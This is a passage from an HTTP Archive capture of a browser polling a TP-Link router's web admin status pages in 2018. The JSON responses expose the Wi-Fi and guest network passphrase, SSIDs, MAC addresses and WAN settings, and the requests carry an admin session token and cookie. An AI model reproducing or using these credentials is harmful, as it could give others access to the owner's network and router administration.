\"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4758,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0.01,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4758\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 693,\r\n \"receive\": 25\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:19.651+03:00\",\r\n \"time\": 1842,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 251,\r\n \"connect\": 523,\r\n \"send\": 0,\r\n \"wait\": 793,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.645+03:00\",\r\n \"time\": 990,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=all\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"all\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 569\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 4755,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"guest_2g5g_psk_key\\\":\\\"64187396\\\",\\\"wan_ipv4_netmask\\\":\\\"255.255.255.255\\\",\\\"wireless_2g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format2\\\":\\\"hex\\\",\\\"guest_2g5g_encryption\\\":\\\"none\\\",\\\"wan_ipv6_conntype\\\":\\\"none\\\",\\\"wireless_5g_wep_key2\\\":\\\"\\\",\\\"wireless_2g_port\\\":\\\"1812\\\",\\\"wireless_2g_htmode\\\":\\\"40\\\",\\\"storage_vendor\\\":\\\"\\\",\\\"wireless_2g_wep_type2\\\":\\\"64\\\",\\\"wireless_5g_wep_select\\\":\\\"1\\\",\\\"wireless_2g_psk_key\\\":\\\"64187396\\\",\\\"wireless_2g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_wep_type4\\\":\\\"64\\\",\\\"wan_ipv4_snddns\\\":\\\"198.168.0.1\\\",\\\"wireless_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_2g_hidden\\\":\\\"off\\\",\\\"wireless_2g_channel\\\":\\\"1\\\",\\\"wireless_2g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_psk_key\\\":\\\"64187396\\\",\\\"lan_ipv4_netmask\\\":\\\"255.255.255.0\\\",\\\"wireless_5g_wep_key1\\\":\\\"\\\",\\\"lan_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"wireless_2g_encryption\\\":\\\"psk\\\",\\\"wireless_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_port\\\":\\\"1812\\\",\\\"wireless_5g_wps_state\\\":\\\"configured\\\",\\\"wireless_5g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_hwmode\\\":\\\"anac_5\\\",\\\"lan_ipv6_link_local_addr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"modem_ipaddr\\\":\\\"0.0.0.0\\\",\\\"wan_ipv6_snddns\\\":\\\"::\\\",\\\"wireless_2g_wep_type4\\\":\\\"64\\\",\\\"guest_2g_ssid\\\":\\\"TP-LINK_Guest_102E\\\",\\\"wireless_5g_wpa_key\\\":\\\"\\\",\\\"guest_isolate\\\":\\\"off\\\",\\\"wan_macaddr\\\":\\\"50-C7-BF-52-10-2F\\\",\\\"wireless_5g_hidden\\\":\\\"off\\\",\\\"wireless_2g_wep_key4\\\":\\\"\\\",\\\"wireless_2g_disabled_all\\\":\\\"off\\\",\\\"wireless_5g_htmode\\\":\\\"auto\\\",\\\"wan_ipv4_gateway\\\":\\\"198.168.0.1\\\",\\\"guest_2g_psk_key\\\":\\\"64187396\\\",\\\"guest_5g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_format4\\\":\\\"hex\\\",\\\"modem_connstatus\\\":0,\\\"wireless_5g_channel\\\":\\\"auto\\\",\\\"wan_ipv6_enable\\\":\\\"off\\\",\\\"guest_2g5g_psk_version\\\":\\\"auto\\\",\\\"wireless_2g_wep_mode\\\":\\\"auto\\\",\\\"wireless_5g_wpa_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type3\\\":\\\"64\\\",\\\"wireless_5g_wds_status\\\":\\\"disable\\\",\\\"wireless_2g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_disabled\\\":\\\"off\\\",\\\"wireless_5g_ssid\\\":\\\"TP-LINK_102E_5G\\\",\\\"wireless_5g_wep_format1\\\":\\\"hex\\\",\\\"storage_capacity\\\":0,\\\"access_devices_wired\\\":[{\\\"wire_type\\\":\\\"wired\\\",\\\"macaddr\\\":\\\"98-DE-D0-F9-0A-C7\\\",\\\"ipaddr\\\":\\\"192.168.0.103\\\",\\\"hostname\\\":\\\"*\\\"}],\\\"guest_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_key\\\":\\\"64187396\\\",\\\"wireless_5g_encryption\\\":\\\"psk\\\",\\\"guest_5g_hidden\\\":\\\"off\\\",\\\"guest_access\\\":\\\"off\\\",\\\"wireless_5g_disabled_all\\\":\\\"off\\\",\\\"guest_5g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"wireless_5g_current_channel\\\":\\\"40\\\",\\\"wireless_2g_wpa_cipher\\\":\\\"auto\\\",\\\"guest_5g_encryption\\\":\\\"none\\\",\\\"wireless_2g_wep_key3\\\":\\\"\\\",\\\"wireless_2g_enable\\\":\\\"on\\\",\\\"guest_2g_encryption\\\":\\\"none\\\",\\\"wireless_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"guest_5g_ssid\\\":\\\"TP-LINK_Guest_102E_5G\\\",\\\"wireless_2g_wep_format4\\\":\\\"hex\\\",\\\"wireless_2g_macaddr\\\":\\\"50-C7-BF-52-10-2E\\\",\\\"guest_2g5g_passwd_cycle\\\":\\\"never\\\",\\\"guest_5g_enable\\\":\\\"off\\\",\\\"guest_2g_psk_version\\\":\\\"auto\\\",\\\"storage_available_unit\\\":\\\"B\\\",\\\"wan_ipv6_gateway\\\":\\\"::\\\",\\\"printer_name\\\":\\\"None\\\",\\\"wireless_2g_wep_key2\\\":\\\"\\\",\\\"printer_count\\\":0,\\\"wireless_2g_wep_format1\\\":\\\"hex\\\",\\\"storage_available\\\":0,\\\"modem_pridns\\\":\\\"0.0.0.0\\\",\\\"modem_signal\\\":\\\"0%\\\",\\\"wireless_2g_current_channel\\\":\\\"1\\\",\\\"wireless_2g_psk_version\\\":\\\"auto\\\",\\\"wireless_5g_wep_type2\\\":\\\"64\\\",\\\"modem_netmask\\\":\\\"0.0.0.0\\\",\\\"conn_type\\\":\\\"0\\\",\\\"wireless_2g_wps_state\\\":\\\"configured\\\",\\\"modem_gateway\\\":\\\"0.0.0.0\\\",\\\"wireless_5g_psk_version\\\":\\\"auto\\\",\\\"modem_snddns\\\":\\\"0.0.0.0\\\",\\\"wireless_2g_ssid\\\":\\\"TP-LINK_102E\\\",\\\"mem_usage\\\":0.63,\\\"cpu_usage\\\":0,\\\"wan_ipv4_ipaddr\\\":\\\"198.168.0.1\\\",\\\"guest_2g_extinfo\\\":{\\\"wds_guest_compatible\\\":\\\"yes\\\",\\\"support_guest_dynpasswd\\\":\\\"no\\\",\\\"support_wds_show\\\":\\\"yes\\\",\\\"support_band\\\":\\\"both\\\",\\\"support_wds_dualmode\\\":\\\"yes\\\",\\\"wds2g_wds5g_compatible\\\":\\\"no\\\"},\\\"lan_ipv6_assign_type\\\":\\\"slaac\\\",\\\"wireless_2g_wep_type3\\\":\\\"64\\\",\\\"wireless_2g_wep_select\\\":\\\"1\\\",\\\"lan_ipv4_ipaddr\\\":\\\"192.168.0.1\\\",\\\"wireless_2g_txpower\\\":\\\"high\\\",\\\"wireless_2g_disabled\\\":\\\"off\\\",\\\"guest_5g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_2g_wpa_key\\\":\\\"\\\",\\\"wireless_5g_txpower\\\":\\\"high\\\",\\\"wan_ipv6_ip6addr\\\":\\\"::\\\",\\\"wireless_5g_wep_mode\\\":\\\"auto\\\",\\\"guest_2g_psk_cipher\\\":\\\"auto\\\",\\\"wireless_5g_wep_key4\\\":\\\"\\\",\\\"wireless_5g_wep_format2\\\":\\\"hex\\\",\\\"wireless_2g_wep_key1\\\":\\\"\\\",\\\"wireless_5g_wep_format3\\\":\\\"hex\\\",\\\"wireless_5g_macaddr\\\":\\\"50-C7-BF-52-10-2D\\\",\\\"lan_ipv4_dhcp_enable\\\":\\\"On\\\",\\\"wireless_2g_server\\\":\\\"\\\",\\\"wireless_5g_server\\\":\\\"\\\",\\\"wireless_2g_hwmode\\\":\\\"bgn\\\",\\\"wireless_5g_wep_type1\\\":\\\"64\\\",\\\"wireless_5g_enable\\\":\\\"on\\\",\\\"wan_ipv4_pridns\\\":\\\"198.168.0.1\\\",\\\"guest_2g_enable\\\":\\\"off\\\",\\\"wireless_5g_wep_key3\\\":\\\"\\\",\\\"wireless_5g_psk_cipher\\\":\\\"auto\\\",\\\"wan_ipv6_pridns\\\":\\\"::\\\",\\\"wireless_2g_hidden\\\":\\\"off\\\",\\\"storage_capacity_unit\\\":\\\"B\\\",\\\"wan_ipv4_conntype\\\":\\\"pppoe\\\",\\\"lan_ipv6_ipaddr\\\":\\\"FE80::52C7:BFFF:FE52:102E/64\\\",\\\"guest_2g5g_psk_cipher\\\":\\\"auto\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 4755\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 276,\r\n \"dns\": 0,\r\n \"connect\": 0,\r\n \"send\": 0,\r\n \"wait\": 674,\r\n \"receive\": 40\r\n },\r\n \"serverIPAddress\": \"198.168.0.1\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:29.651+03:00\",\r\n \"time\": 1855,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": \"http://198.168.0.1:8081/cgi-bin/luci/;stok=c3a68d8a0f1e21ffc30452833e2ddde7/admin/status?form=internet\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Host\",\r\n \"value\": \"198.168.0.1:8081\"\r\n },\r\n {\r\n \"name\": \"User-Agent\",\r\n \"value\": \"Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0\"\r\n },\r\n {\r\n \"name\": \"Accept\",\r\n \"value\": \"application/json, text/javascript, */*; q=0.01\"\r\n },\r\n {\r\n \"name\": \"Accept-Language\",\r\n \"value\": \"en-US,en;q=0.5\"\r\n },\r\n {\r\n \"name\": \"Accept-Encoding\",\r\n \"value\": \"gzip, deflate\"\r\n },\r\n {\r\n \"name\": \"Referer\",\r\n \"value\": \"http://198.168.0.1:8081/webpages/index.html\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/x-www-form-urlencoded; charset=UTF-8\"\r\n },\r\n {\r\n \"name\": \"X-Requested-With\",\r\n \"value\": \"XMLHttpRequest\"\r\n },\r\n {\r\n \"name\": \"Content-Length\",\r\n \"value\": \"14\"\r\n },\r\n {\r\n \"name\": \"Cookie\",\r\n \"value\": \"sysauth=e3638eb1f1952c2a56bd50f466603048\"\r\n },\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"keep-alive\"\r\n }\r\n ],\r\n \"cookies\": [\r\n {\r\n \"name\": \"sysauth\",\r\n \"value\": \"e3638eb1f1952c2a56bd50f466603048\"\r\n }\r\n ],\r\n \"queryString\": [\r\n {\r\n \"name\": \"form\",\r\n \"value\": \"internet\"\r\n }\r\n ],\r\n \"postData\": {\r\n \"mimeType\": \"application/x-www-form-urlencoded\",\r\n \"params\": [],\r\n \"text\": \"operation=read\"\r\n },\r\n \"headersSize\": 574\r\n },\r\n \"response\": {\r\n \"status\": 200,\r\n \"statusText\": \"OK\",\r\n \"httpVersion\": \"HTTP/1.1\",\r\n \"headers\": [\r\n {\r\n \"name\": \"Connection\",\r\n \"value\": \"close\"\r\n },\r\n {\r\n \"name\": \"Transfer-Encoding\",\r\n \"value\": \"chunked\"\r\n },\r\n {\r\n \"name\": \"Content-Type\",\r\n \"value\": \"application/json\"\r\n },\r\n {\r\n \"name\": \"Cache-Control\",\r\n \"value\": \"no-cache\"\r\n },\r\n {\r\n \"name\": \"Expires\",\r\n \"value\": \"0\"\r\n }\r\n ],\r\n \"cookies\": [],\r\n \"content\": {\r\n \"mimeType\": \"application/json\",\r\n \"size\": 55,\r\n \"text\": \"{\\\"success\\\":true,\\\"data\\\":{\\\"internet_status\\\":\\\"connected\\\"}}\"\r\n },\r\n \"redirectURL\": \"\",\r\n \"headersSize\": 135,\r\n \"bodySize\": 55\r\n },\r\n \"cache\": {},\r\n \"timings\": {\r\n \"blocked\": 271,\r\n \"dns\": 250,\r\n \"connect\": 520,\r\n \"send\": 0,\r\n \"wait\": 810,\r\n \"receive\": 4\r\n },\r\n \"serverIPAddress\": \"198.168.0.1:8081\",\r\n \"connection\": \"8081\"\r\n },\r\n {\r\n \"pageref\": \"page_1\",\r\n \"startedDateTime\": \"2018-07-17T13:10:39.647+03:00\",\r\n \"time\": 995,\r\n \"request\": {\r\n \"bodySize\": 14,\r\n \"method\": \"POST\",\r\n \"url\": 